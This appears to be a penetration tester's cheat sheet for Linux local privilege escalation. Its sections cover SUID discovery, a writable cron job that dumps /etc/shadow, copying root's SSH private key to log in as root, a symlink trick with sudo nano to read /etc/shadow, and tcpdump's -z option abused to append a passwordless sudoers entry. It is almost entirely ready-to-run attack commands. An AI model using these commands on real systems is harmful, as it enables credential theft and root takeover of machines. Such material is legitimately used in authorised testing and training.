Local Privilege Escalation

SUID

find / -perm -4000 2>/dev/null

Exploitation depends on functionality of SUID. Reading files or writing files leads to grabbing SSH / shadow files.

Cron

# Find bad privs
find /etc/cron* -type f -perm -o+w -exec ls -l {} \;
​
# Look at when it will run and who as
cat /etc/crontab
​
# Get it to write to shadow file
echo -e '#!/bin/bash\n/bin/cat /etc/shadow > /tmp/shadow' > /etc/cron.hourly/oddjob

Readable SSH

# Check listing root
ls -la /root
​
# Check listing ssh
ls -la /root/.ssh
​
# Read file (worth trying even if you cant list contents of .ssh
cat /root/.ssh/id_rsa
​
# Make SSH dir
mkdir /home/<user>/.ssh
​
# Copy SSH into it
cp /root/.ssh/id_rsa /home/<user>/.ssh
​
# Change Perms
chmod o-rwx /home/<user>/.ssh/id_rsa
​
# SSH
ssh -i /home/<user>/.ssh/id_rsa root@localhost

Symlink

# Check sudo rights
sudo -l
​
# If you have sudo rights for something like nano on a specific file
# Create symlink to link that file to shadow and then read it
# File in example is readme.txt
​
ln -s /etc/shadow readme.txt
# Link to proper terminal
export TERM=xterm
​
#Read file
sudo nano readme.txt

TCPDump

# If tcpdump is in sudo list then we can abuse
​
# Create a file /tmp/elevate
​
#!/bin/bash
echo β€œjames ALL=(root) NOPASSWD: ALL” >> /etc/sudoers
​
chmod +x /tmp/elevate
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root
​
sudo bash